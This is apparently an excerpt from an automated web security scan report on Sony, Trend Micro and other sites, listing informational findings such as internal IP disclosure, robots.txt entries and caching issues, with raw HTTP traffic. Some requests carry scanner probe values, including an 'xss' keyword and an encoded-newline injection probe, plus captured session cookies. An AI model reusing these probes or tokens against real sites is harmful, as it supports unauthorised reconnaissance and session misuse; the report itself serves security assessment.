GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10
Response
HTTP/1.1 200 OK Last-Modified: Wed, 17 Aug 2011 19:11:58 GMT Accept-Ranges: bytes ntCoent-Length: 30189 Content-Type: application/x-javascript Content-Length: 30189 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:48:33 GMT Connection: close Cache-Control: private /* * DEV changelog * * 08.04.11 - JT : Adding function trackImpression to populate omniture variable 'prop29' (page state) * 08.12.11 - JT : Adding code to clear 'prop29' in function 'clearOmni...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]...
16.2. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js
Issue detail
The following RFC 1918 IP address was disclosed in the response:
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true
Response
HTTP/1.1 200 OK Last-Modified: Fri, 15 Jul 2011 18:28:02 GMT Accept-Ranges: bytes ntCoent-Length: 14211 Content-Type: application/x-javascript Content-Length: 14211 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:49:52 GMT Connection: close Cache-Control: private /* SONY | SONY STYLE * TV LANDING PAGE Project JS Functions and Event Listeners * * Authors: * Alex Jain, Sr Assoiciate Interactive Development | B2C CST SAPE Augmentation team aljain@sapient...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]...
16.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js
Issue detail
The following RFC 1918 IP address was disclosed in the response:
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true
Response
HTTP/1.1 200 OK Last-Modified: Fri, 05 Aug 2011 21:36:13 GMT Accept-Ranges: bytes ntCoent-Length: 12440 Content-Type: application/x-javascript Content-Length: 12440 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:49:52 GMT Connection: close Cache-Control: private /******* The Tabbing class AUTHOR: Jonathan Cheung, Sr. Flash Developer for Sony Style, Sony Electronics DATE: Feb 16, 2010 DESCRIPTION: This class can easily provide custom tabbing with deep linking...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]...
16.4. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js
Issue detail
The following RFC 1918 IP address was disclosed in the response:
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true
Response
HTTP/1.1 200 OK Last-Modified: Thu, 30 Jun 2011 22:25:11 GMT Accept-Ranges: bytes ntCoent-Length: 15544 Content-Type: application/x-javascript Content-Length: 15544 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:49:52 GMT Connection: close Cache-Control: private if( typeof moduleSpace == 'undefined' ){ var moduleSpace = {}; } if( typeof utilSpace == 'undefined' ){ var utilSpace = {}; } //avoiding use of global variables. //using a global object to store ...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]...
16.5. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js
Issue detail
The following RFC 1918 IP address was disclosed in the response:
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js HTTP/1.1 Host: store.sony.com Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10
Response
HTTP/1.1 200 OK Last-Modified: Thu, 01 Sep 2011 22:46:39 GMT Accept-Ranges: bytes ntCoent-Length: 15093 Content-Type: application/x-javascript Content-Length: 15093 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:48:33 GMT Connection: close Cache-Control: private if( typeof moduleSpace == 'undefined' ){ var moduleSpace = {}; } if( typeof utilSpace == 'undefined' ){ var utilSpace = {}; } //avoiding use of global variables. //using a global object to store "glo...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... <script language=\"JavaScript\" src=\"http://192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]...
17. Robots.txt file
previous
next
There are 7 instances of this issue:
Issue background
The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index. The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.
Issue remediation
The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.
17.1. http://blog.trendmicro.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: blog.trendmicro.com
Response
HTTP/1.0 200 OK Server: nginx/0.8.54 Content-Type: text/plain; charset=UTF-8 Pragma: no-cache X-Varnish: 1696291583 Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Tue, 06 Sep 2011 18:16:29 GMT Date: Tue, 06 Sep 2011 18:16:29 GMT Content-Length: 614 Connection: close User-agent: * Disallow: /cgi-bin Disallow: /wp-admin Disallow: /wp-includes Disallow: /wp-content/plugins Disallow: /wp-content/cache Disallow: /trackback Disallow: /comments Disallow: /catego...[SNIP]...
17.2. http://display.digitalriver.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://display.digitalriver.com
Path:
/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: display.digitalriver.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 18:13:03 GMT Server: Apache/2.2.9 Last-Modified: Wed, 27 Oct 2010 13:56:47 GMT ETag: "18063c-1a-4939998a3e5c0" Accept-Ranges: bytes Content-Length: 26 Connection: close Content-Type: text/plain User-agent: * Disallow: /
17.3. http://pastebin.com/i/fixed.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pastebin.com
Path:
/i/fixed.css
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: pastebin.com
Response
HTTP/1.1 200 OK Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:35 GMT Content-Type: text/plain Content-Length: 178 Last-Modified: Thu, 30 Jun 2011 08:34:38 GMT Connection: close Vary: Accept-Encoding Accept-Ranges: bytes User-agent: * Disallow: /download.php Disallow: /report.php Disallow: /raw.php Disallow: /embed.php Disallow: /embed_iframe.php Disallow: /embed_js.php Disallow: /diff.php
17.4. https://store.trendmicro.com/store
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/store
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: store.trendmicro.com
Response
HTTP/1.1 200 OK ETag: "49-3ebbc10b" Content-Type: text/plain Last-Modified: Fri, 09 May 2003 14:54:03 GMT Connection: close Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (G;max-age=0+0;age=0;ecid=67000669097,0) Content-Length: 73 Date: Thu, 02 Jun 2011 21:28:55 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app96 Accept-Ranges: bytes User-agent: Ultraseek Disallow: / User-agent: Inktomi Search Disallow: /
17.5. http://www.javalobby.org/articles/acegisecurity/part1.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.javalobby.org
Path:
/articles/acegisecurity/part1.jsp
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: www.javalobby.org
Response
HTTP/1.0 200 OK Server: Resin/3.2.1 ETag: "A/EKk8WQ8Th" Last-Modified: Tue, 14 Oct 2008 18:02:16 GMT Cache-Control: max-age=5 Expires: Tue, 06 Sep 2011 17:55:40 GMT Content-Type: text/plain Content-Length: 844 Date: Tue, 06 Sep 2011 17:55:35 GMT User-Agent: Googlebot Disallow: /account!default.jspa Disallow: /account.jspa Disallow: /av/javapolis/createorlogin!default.jspa Disallow: /css Disallow: /discussionContext/showThreaded/frm/javalobby...[SNIP]...
17.6. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.javaworld.com
Path:
/javaworld/jw-10-2007/jw-10-acegi2.html
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: www.javaworld.com
Response
HTTP/1.1 200 OK Age: 3946 Date: Tue, 06 Sep 2011 17:45:53 GMT Cache-Control: max-age=600 ,public Connection: Keep-Alive Via: NS-CACHE-8.0: 1 ETag: "7340c3-3e3-48824a805df80" Server: Apache/2.2.3 (CentOS) Set-Cookie: Apache=173.192.135.178.1315331027247935; path=/; expires=Thu, 05-Sep-13 17:43:47 GMT Last-Modified: Thu, 03 Jun 2010 18:48:46 GMT Accept-Ranges: bytes Content-Length: 995 Content-Type: text/plain; charset=UTF-8 # This robot.txt file should turn on ALL robots, crawlers and worms for visting # ALL of your pages. The URL I extracted this from is at: # # http://info.webcrawler.com/mak/projects/robots/norobots...[SNIP]...
17.7. http://www.viddler.com/embed/dca1712/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.viddler.com
Path:
/embed/dca1712/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: www.viddler.com
Response
HTTP/1.1 200 OK Server: nginx/0.6.32 Date: Tue, 06 Sep 2011 20:52:09 GMT Content-Type: text/plain Connection: close Last-Modified: Mon, 11 Oct 2010 13:24:54 GMT ETag: "780767-23-492574927d580" Accept-Ranges: bytes Content-Length: 35 Vary: Accept-Encoding User-Agent: * Disallow: /search/?
18. Cacheable HTTPS response
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/favicon.ico
Issue description
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:Cache-control: no-store Pragma: no-cache
Request
GET /favicon.ico HTTP/1.1 Host: store.trendmicro.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: __qca=P0-1207819931-1315351119372; bn_u=6923713920140458023; __utma=44797537.1048817980.1315351191.1315351191.1315351191.1; __utmz=44797537.1315351191.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; fsr.r={"d":90,"i":"1315351193052_377417","e":1315956018002}; __unam=e9c3bfd-132410b0872-607b674b-1; ORA_WX_SESSION=10.2.2.129:260-0#0; JSESSIONID=885803A57111A855BDA3F7D5608FCD0D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000
Response
HTTP/1.1 200 OK ETag: "37e-4b6b21a0" Content-Type: text/plain Last-Modified: Thu, 04 Feb 2010 19:36:00 GMT Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=28800+0;age=21646;ecid=97070579830,0) Content-Length: 894 Date: Thu, 02 Jun 2011 21:05:38 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb01@dc2app93 Accept-Ranges: bytes ..............h.......(....... ...............H...H...........................................................VVW .....tOL+. ...Q. ...[SNIP]...
19. HTML does not specify charset
previous
next
There are 4 instances of this issue:
Issue description
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters. In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1 .
19.1. http://display.digitalriver.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://display.digitalriver.com
Path:
/
Request
GET /?aid=244&tax=trend_micro HTTP/1.1 Host: display.digitalriver.com Proxy-Connection: keep-alive Referer: http://us.trendmicro.com/us/home/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 18:13:02 GMT Server: Apache/2.2.9 Expires: Tue, 06 Sep 2011 18:43:02 GMT Last-Modified: Tue, 06 Sep 2011 18:13:02 GMT Content-Length: 206 Connection: closeContent-Type: text/html var dgt_script = document.createElement('SCRIPT'); dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro'; document.getElementsByTagName('head')[0].appendChild(dgt_scr...[SNIP]...
19.2. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SYSearchAjax
Request
GET /webapp/wcs/stores/servlet/SYSearchAjax?keyword=xss&storeId=10151&langId=-1&catalogId=10551 HTTP/1.1 Host: store.sony.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category Cookie: CompareGrid=; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; 